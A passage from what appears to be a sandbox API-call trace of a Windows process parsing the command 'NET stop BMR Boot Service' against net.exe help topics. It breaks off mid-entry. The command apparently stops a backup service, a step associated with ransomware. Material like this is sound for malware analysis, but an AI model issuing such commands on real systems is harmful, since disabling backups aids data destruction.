returned 0x0 [0055.568] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģౄ") returned 0x58 [0055.568] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET TIME\r\n\r\n[\\\\computerna", _MaxCount=0x19) returned -1 [0055.568] LocalFree (hMem=0x3290348) returned 0x0 [0055.568] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģే") returned 0x184 [0055.568] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET USE\r\n[devicename | *]", _MaxCount=0x19) returned -2 [0055.568] LocalFree (hMem=0x3290348) returned 0x0 [0055.568] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģొ") returned 0xf0 [0055.568] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET USER\r\n[username [pass", _MaxCount=0x19) returned -2 [0055.568] LocalFree (hMem=0x3290348) returned 0x0 [0055.568] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ్") returned 0x47 [0055.568] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET VIEW\r\n[\\\\computername", _MaxCount=0x19) returned -3 [0055.568] LocalFree (hMem=0x3290348) returned 0x0 [0055.568] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ౐") returned 0xc2 [0055.568] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET\r\n [ ACCOUNTS | COM", _MaxCount=0x19) returned 19 [0055.568] LocalFree (hMem=0x3290348) returned 0x0 [0055.568] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ౓") returned 0x28d [0055.568] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="SERVICES\r\nNET START can b", _MaxCount=0x19) returned -5 [0055.568] LocalFree (hMem=0x3290348) returned 0x0 [0055.568] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģౖ") returned 0x483 [0055.568] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="SYNTAX\r\nThe following con", _MaxCount=0x19) returned -5 [0055.568] LocalFree (hMem=0x3290348) returned 0x0 [0055.568] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģౙ") returned 0xa86 [0055.568] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NAMES\r\nThe following type", _MaxCount=0x19) returned 4 [0055.568] LocalFree (hMem=0x3290348) returned 0x0 [0055.568] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ౜") returned 0x54 [0055.569] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="\r\nFor more information on", _MaxCount=0x19) returned 97 [0055.569] LocalFree (hMem=0x3290348) returned 0x0 [0055.569] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ௼") returned 0xad [0055.569] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET ACCOUNTS\r\n[/F", _MaxCount=0x11) returned 18 [0055.569] LocalFree (hMem=0x3290348) returned 0x0 [0055.569] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ௿") returned 0x2e [0055.569] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET COMPUTER\r\n\\\\c", _MaxCount=0x11) returned 16 [0055.569] LocalFree (hMem=0x3290348) returned 0x0 [0055.569] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģం") returned 0x7d [0055.569] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET CONFIG SERVER", _MaxCount=0x11) returned 16 [0055.569] LocalFree (hMem=0x3290348) returned 0x0 [0055.569] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఅ") returned 0x26 [0055.569] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET CONFIG\r\n[SERV", _MaxCount=0x11) returned 16 [0055.569] LocalFree (hMem=0x3290348) returned 0x0 [0055.569] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģఈ") returned 0x19 [0055.569] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET CONTINUE\r\nser", _MaxCount=0x11) returned 16 [0055.569] LocalFree (hMem=0x3284278) returned 0x0 [0055.569] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఋ") returned 0x1b [0055.569] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET FILE\r\n[id [/C", _MaxCount=0x11) returned 13 [0055.569] LocalFree (hMem=0x3290348) returned 0x0 [0055.569] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఎ") returned 0xbe [0055.569] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET GROUP\r\n[group", _MaxCount=0x11) returned 12 [0055.569] LocalFree (hMem=0x3290348) returned 0x0 [0055.569] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ఑") returned 0x33 [0055.569] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET HELP\r\ncommand", _MaxCount=0x11) returned 11 [0055.569] LocalFree (hMem=0x3290348) returned 0x0 [0055.569] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģఔ") returned 0x19 [0055.569] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET HELPMSG\r\nmess", _MaxCount=0x11) returned 11 [0055.569] LocalFree (hMem=0x3284278) returned 0x0 [0055.569] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģగ") returned 0xc1 [0055.569] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET LOCALGROUP\r\n[", _MaxCount=0x11) returned 7 [0055.569] LocalFree (hMem=0x3290348) returned 0x0 [0055.569] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="诠̨ć蛬ģచ") returned 0x16 [0055.569] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET PAUSE\r\nservic", _MaxCount=0x11) returned 3 [0055.569] LocalFree (hMem=0x3288be0) returned 0x0 [0055.569] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఝ") returned 0x33 [0055.570] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET SESSION\r\n[\\\\c", _MaxCount=0x11) returned 15 [0055.570] LocalFree (hMem=0x3290348) returned 0x0 [0055.570] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఠ") returned 0x234 [0055.570] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET SHARE\r\nsharen", _MaxCount=0x11) returned 12 [0055.570] LocalFree (hMem=0x3290348) returned 0x0 [0055.570] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䙨̨ć蛬ģణ") returned 0x13 [0055.570] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START BROWSER", _MaxCount=0x11) returned 14 [0055.570] LocalFree (hMem=0x3284668) returned 0x0 [0055.570] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģద") returned 0x14 [0055.570] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START EVENTLO", _MaxCount=0x11) returned 14 [0055.570] LocalFree (hMem=0x3284278) returned 0x0 [0055.570] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģ఩") returned 0x14 [0055.570] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START NETLOGO", _MaxCount=0x11) returned 14 [0055.570] LocalFree (hMem=0x3284278) returned 0x0 [0055.570] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="㞠̨ć蛬ģబ") returned 0x11 [0055.570] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START RPCSS\r\n", _MaxCount=0x11) returned 14 [0055.570] LocalFree (hMem=0x32837a0) returned 0x0 [0055.570] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģయ") returned 0x14 [0055.570] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START SCHEDUL", _MaxCount=0x11) returned 14 [0055.570] LocalFree (hMem=0x3284278) returned 0x0 [0055.570] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䙨̨ć蛬ģల") returned 0x12 [0055.570] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START SERVER\r", _MaxCount=0x11) returned 14 [0055.570] LocalFree (hMem=0x3284668) returned 0x0 [0055.570] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="㞠̨ć蛬ģవ") returned 0xf [0055.570] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START UPS\r\n", _MaxCount=0x11) returned 14 [0055.570] LocalFree (hMem=0x32837a0) returned 0x0 [0055.570] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="诠̨ć蛬ģస") returned 0x17 [0055.570] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START WORKSTA", _MaxCount=0x11) returned 14 [0055.570] LocalFree (hMem=0x3288be0) returned 0x0 [0055.570] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="诠̨ć蛬ģ఻") returned 0x18 [0055.571] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START\r\n[servi", _MaxCount=0x11) returned 14 [0055.571] LocalFree (hMem=0x3288be0) returned 0x0 [0055.571] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģా") returned 0x21 [0055.571] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET STATISTICS\r\n[", _MaxCount=0x11) returned 14 [0055.571] LocalFree (hMem=0x3290348) returned 0x0 [0055.571] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="诠̨ć蛬ģు") returned 0x15 [0055.571] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET STOP\r\nservice", _MaxCount=0x11) returned 19 [0055.571] LocalFree (hMem=0x3288be0) returned 0x0 [0055.571] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģౄ") returned 0x58 [0055.571] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET TIME\r\n\r\n[\\\\co", _MaxCount=0x11) returned -1 [0055.571] LocalFree (hMem=0x3290348) returned 0x0 [0055.571] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģే") returned 0x184 [0055.571] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET USE\r\n[devicen", _MaxCount=0x11) returned -2 [0055.571] LocalFree (hMem=0x3290348) returned 0x0 [0055.571] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģొ") returned 0xf0 [0055.571] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET USER\r\n[userna", _MaxCount=0x11) returned -2 [0055.571] LocalFree (hMem=0x3290348) returned 0x0 [0055.571] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ్") returned 0x47 [0055.571] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET VIEW\r\n[\\\\comp", _MaxCount=0x11) returned -3 [0055.571] LocalFree (hMem=0x3290348) returned 0x0 [0055.571] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ౐") returned 0xc2 [0055.571] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET\r\n [ ACCOUN", _MaxCount=0x11) returned 19 [0055.571] LocalFree (hMem=0x3290348) returned 0x0 [0055.571] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ౓") returned 0x28d [0055.571] _wcsnicmp (_String1="NET stop BMR Boot", _String2="SERVICES\r\nNET STA", _MaxCount=0x11) returned -5 [0055.571] LocalFree (hMem=0x3290348) returned 0x0 [0055.571] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģౖ") returned 0x483 [0055.571] _wcsnicmp (_String1="NET stop BMR Boot", _String2="SYNTAX\r\nThe follo", _MaxCount=0x11) returned -5 [0055.571] LocalFree (hMem=0x3290348) returned 0x0 [0055.571] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģౙ") returned 0xa86 [0055.571] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NAMES\r\nThe follow", _MaxCount=0x11) returned 4 [0055.571] LocalFree (hMem=0x3290348) returned 0x0 [0055.571] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ౜") returned 0x54 [0055.571] _wcsnicmp (_String1="NET stop BMR Boot", _String2="\r\nFor more inform", _MaxCount=0x11) returned 97 [0055.571] LocalFree (hMem=0x3290348) returned 0x0 [0055.571] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ௼") returned 0xad [0055.572] _wcsnicmp (_String1="NET stop BMR", _String2="NET ACCOUNTS", _MaxCount=0xc) returned 18 [0055.572] LocalFree (hMem=0x3290348) returned 0x0 [0055.572] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ௿") returned 0x2e [0055.572] _wcsnicmp (_String1="NET stop BMR", _String2="NET COMPUTER", _MaxCount=0xc) returned 16 [0055.572] LocalFree (hMem=0x3290348) returned 0x0 [0055.572] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģం") returned 0x7d [0055.572] _wcsnicmp (_String1="NET stop BMR", _String2="NET CONFIG S", _MaxCount=0xc) returned 16 [0055.572] LocalFree (hMem=0x3290348) returned 0x0 [0055.572] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఅ") returned 0x26 [0055.572] _wcsnicmp (_String1="NET stop BMR", _String2="NET CONFIG\r\n", _MaxCount=0xc) returned 16 [0055.572] LocalFree (hMem=0x3290348) returned 0x0 [0055.572] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģఈ") returned 0x19 [0055.572] _wcsnicmp (_String1="NET stop BMR", _String2="NET CONTINUE", _MaxCount=0xc) returned 16 [0055.572] LocalFree (hMem=0x3284278) returned 0x0 [0055.572] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఋ") returned 0x1b [0055.572] _wcsnicmp (_String1="NET stop BMR", _String2="NET FILE\r\n[i", _MaxCount=0xc) returned 13 [0055.572] LocalFree (hMem=0x3290348) returned 0x0 [0055.572] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఎ") returned 0xbe [0055.572] _wcsnicmp (_String1="NET stop BMR", _String2="NET GROUP\r\n[", _MaxCount=0xc) returned 12 [0055.572] LocalFree (hMem=0x3290348) returned 0x0 [0055.572] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ఑") returned 0x33 [0055.572] _wcsnicmp (_String1="NET stop BMR", _String2="NET HELP\r\nco", _MaxCount=0xc) returned 11 [0055.572] LocalFree (hMem=0x3290348) returned 0x0 [0055.572] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģఔ") returned 0x19 [0055.572] _wcsnicmp (_String1="NET stop BMR", _String2="NET HELPMSG\r", _MaxCount=0xc) returned 11 [0055.572] LocalFree (hMem=0x3284278) returned 0x0 [0055.572] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģగ") returned 0xc1 [0055.572] _wcsnicmp (_String1="NET stop BMR", _String2="NET LOCALGRO", _MaxCount=0xc) returned 7 [0055.572] LocalFree (hMem=0x3290348) returned 0x0 [0055.572] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="诠̨ć蛬ģచ") returned 0x16 [0055.572] _wcsnicmp (_String1="NET stop BMR", _String2="NET PAUSE\r\ns", _MaxCount=0xc) returned 3 [0055.572] LocalFree (hMem=0x3288be0) returned 0x0 [0055.572] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఝ") returned 0x33 [0055.572] _wcsnicmp (_String1="NET stop BMR", _String2="NET SESSION\r", _MaxCount=0xc) returned 15 [0055.572] LocalFree (hMem=0x3290348) returned 0x0 [0055.572] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఠ") returned 0x234 [0055.572] _wcsnicmp (_String1="NET stop BMR", _String2="NET SHARE\r\ns", _MaxCount=0xc) returned 12 [0055.573] LocalFree (hMem=0x3290348) returned 0x0 [0055.573] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䙨̨ć蛬ģణ") returned 0x13 [0055.573] _wcsnicmp (_String1="NET stop BMR", _String2="NET START BR", _MaxCount=0xc) returned 14 [0055.573] LocalFree (hMem=0x3284668) returned 0x0 [0055.573] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģద") returned 0x14 [0055.573] _wcsnicmp (_String1="NET stop BMR", _String2="NET START EV", _MaxCount=0xc) returned 14 [0055.573] LocalFree (hMem=0x3284278) returned 0x0 [0055.573] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģ఩") returned 0x14 [0055.573] _wcsnicmp (_String1="NET stop BMR", _String2="NET START NE", _MaxCount=0xc) returned 14 [0055.573] LocalFree (hMem=0x3284278) returned 0x0 [0055.573] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="㞠̨ć蛬ģబ") returned 0x11 [0055.573] _wcsnicmp (_String1="NET stop BMR", _String2="NET START RP", _MaxCount=0xc) returned 14 [0055.573] LocalFree (hMem=0x32837a0) returned 0x0 [0055.573] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģయ") returned 0x14 [0055.573] _wcsnicmp (_String1="NET stop BMR", _String2="NET START SC", _MaxCount=0xc) returned 14 [0055.573] LocalFree (hMem=0x3284278) returned 0x0 [0055.573] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䙨̨ć蛬ģల") returned 0x12 [0055.573] _wcsnicmp (_String1="NET stop BMR", _String2="NET START SE", _MaxCount=0xc) returned 14 [0055.573] LocalFree (hMem=0x3284668) returned 0x0 [0055.573] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="㞠̨ć蛬ģవ") returned 0xf [0055.573] _wcsnicmp (_String1="NET stop BMR", _String2="NET START UP", _MaxCount=0xc) returned 14 [0055.573] LocalFree (hMem=0x32837a0) returned 0x0 [0055.573] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="诠̨ć蛬ģస") returned 0x17 [0055.573] _wcsnicmp (_String1="NET stop BMR", _String2="NET START WO", _MaxCount=0xc) returned 14 [0055.573] LocalFree (hMem=0x3288be0) returned 0x0 [0055.573] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="诠̨ć蛬ģ఻") returned 0x18 [0055.573] _wcsnicmp (_String1="NET stop BMR", _String2="NET START\r\n[", _MaxCount=0xc) returned 14 [0055.573] LocalFree (hMem=0x3288be0) returned 0x0 [0055.573] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģా") returned 0x21 [0055.573] _wcsnicmp (_String1="NET stop BMR", _String2="NET STATISTI", _MaxCount=0xc) returned 14 [0055.573] LocalFree (hMem=0x3290348) returned 0x0 [0055.573] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="诠̨ć蛬ģు") returned 0x15 [0055.573] _wcsnicmp (_String1="NET stop BMR", _String2="NET STOP\r\nse", _MaxCount=0xc) returned 19 [0055.573] LocalFree (hMem=0x3288be0) returned 0x0 [0055.573] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģౄ") returned 0x58 [0055.573] _wcsnicmp (_String1="NET stop BMR", _String2="NET TIME\r\n\r\n", _MaxCount=0xc) returned -1 [0055.573] LocalFree (hMem=0x3290348) returned 0x0 [0055.574] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģే") returned 0x184 [0055.574] _wcsnicmp 